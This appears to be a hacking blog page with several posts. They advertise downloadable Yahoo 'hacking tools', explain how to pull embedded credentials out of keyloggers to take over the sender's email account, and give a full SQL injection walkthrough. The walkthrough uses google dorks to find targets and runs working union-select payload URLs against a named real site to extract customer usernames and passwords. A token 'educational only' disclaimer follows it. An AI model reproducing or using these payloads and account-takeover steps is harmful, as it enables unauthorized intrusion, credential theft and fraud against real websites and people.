Showing posts with label hacking hacker. Show all posts
Showing posts with label hacking hacker. Show all posts

May 2, 2013

Hack the HAcker: BIN text









Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:

2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.

This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!

Download here:
http://www.mediafire.com/download.php?xna2noo1nhc6c8a

Mar 21, 2013

Yahoo Hacking Tools


Yahoo Hacking Tools

Most of the books and stuff at this site use rar, You need to extract the files before you can use it.To download all tools , It's Better you install Internet Download Manager to make your computer download the file faster, all the files is zipped by Winrar. Install both the software before you download the files.

Any tools that use and relevance with yahoo accessories will be available to make up your fun in your daily ..... get download the tools for free by click the title name of the tools

Password Decrypter2k v1.0
RevelationV2.zip
Yahoo Avatar Hack.rar
Yahoo Crazy Talk.rar
Yahoo Delete me.rar
Yahoo Magic Avatar.rar
Yahoo Message Archive Decoder.rar
Yahoo Monitor.rar
Yahoo New Sounds.rar
Yahoo On - Of.rar
Yahoo Rapid Make Mail.rar
Yahoo Spy.rar
Yahoo Webcam Acces.rar
Yahoo Winamp.rar

Website hacking


to find a website with the url ending with
.php?id=4383
where 4383 can be any number . Now in google i have some tricks where you can actually look for some sites ending with this tag.
use these following commands in google .
inurl:shop.php?id=
inurl:shopping.php?id=
inurl:sell.php?id=
Now once you get any website with this url , open that website . For demonstration i am taking a website
http://pkmotors.com/ads_detail.php?nAddsID=17156%27
Step 2
Add ‘ after id=****
Now, if u are getting an error or a blank page after addition of ‘ then site is accepting sql commands from address bar of browser , which means site is vulnerable to sql injection.
http://pkmotors.com/ads_detail.php?nAddsID=17156%27′
Step 3
Now next step is to find out number of vulnerable links
example – id=43434′ order by 1 –
check the number of vulnurable links by putting values 1,2,3,4 etc.. till wich the page does not gives error.
http://pkmotors.com/ads_detail.php?nAddsID=17156%27 order by 1 / order by 2 / etc until it comes blank
Step 4
Find out names of tables and columns
http://pkmotors.com/ads_detail.php?nAddsID=-17156%27 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 –
Step 5
Now what next we have to do is
replace the upper link with -17156′ union all select table_name,*,*,*,* from information_schema.tables –
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name%20from%20information_schema.tables%20–
Step 6
here group concat will give the details of all the tables in the database of the website
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28table_name%29%20from%20information_schema.tables%20%20–
Step 7
But since we are hacker :p , we are always interested in one table and that is the admin table so , look out for admin table in the list of displayed table names. Now here we chose the customer table because this is a shopping website and we want to shop from a user’s account so we will search for columns in the customer table by the following commands below
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27customer%27%20–
Step 8
same extracting information of every column of that table via group concat
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115,116,111,109,101,114%29%20–
Step 9
Now we get two column fields after executing the upper commands , that is
strUsername
strPassword
Now the limit fun. below will search for the username of the particular person with the id=1684
// here %20 in the url is not any command , it comes automatically once we execute our commands on the browser
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strUsername%20from%20customer%20limit%201684,1%20–
Step 10
we finally got the username of the person and now we will look for the password of that person typing the same command and replacing strPassword with strUsername.
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strPassword%20from%20customer%20limit%201684,1%20–
Finally you have the username and the password of the person of your wish , now do what ever you want to do )
NOTE : These all steps of Hacking are just meant to teach how sql Injection can be done, no illegal work should be done from the above skills.

Jan 17, 2011

hacking hacker

Hacking The Hacker Instantly New Trick To Take Revengue On Them


Now a days we can't trust anyone even an trusted company as it can send us spyware or server.exe and it will send all passwords from our pc to hacker so to take revengue read full post...



If you have read my article on hacking using key loggers, then you can understand this article.




So in this article I will explain to you how you can hack the password of the person who sent a key logger to you to hack.




HOW DARE HE????!!!! Come on lets teach him a lesson




So you scanned your computer and found a key logger remotely sending logs to the person who created it. Don’t freak out. Don’t delete it before you have had your revenge on him.



Download this software: BINTEXT

( note:- you can also use any hex editor )


http://www.softpedia.com/progDownload/BinText-Download-138176.html

Run it.


Open your desired key logger from the browse tab and then click go


Now we have to find his username and password. At the space filled before find type yahoo or gmail or @ symbol. It can be anything the hacker uses to get your logs from.




That’s all. Now leave a comment for me because I helped you hack a hacker. You can even get a lot of passwords by going to youtube and downloading fake programs which contains backdoors or Trojans and scanning them in the way you I taught you just now.




You hacked a hacker. Its something worth telling.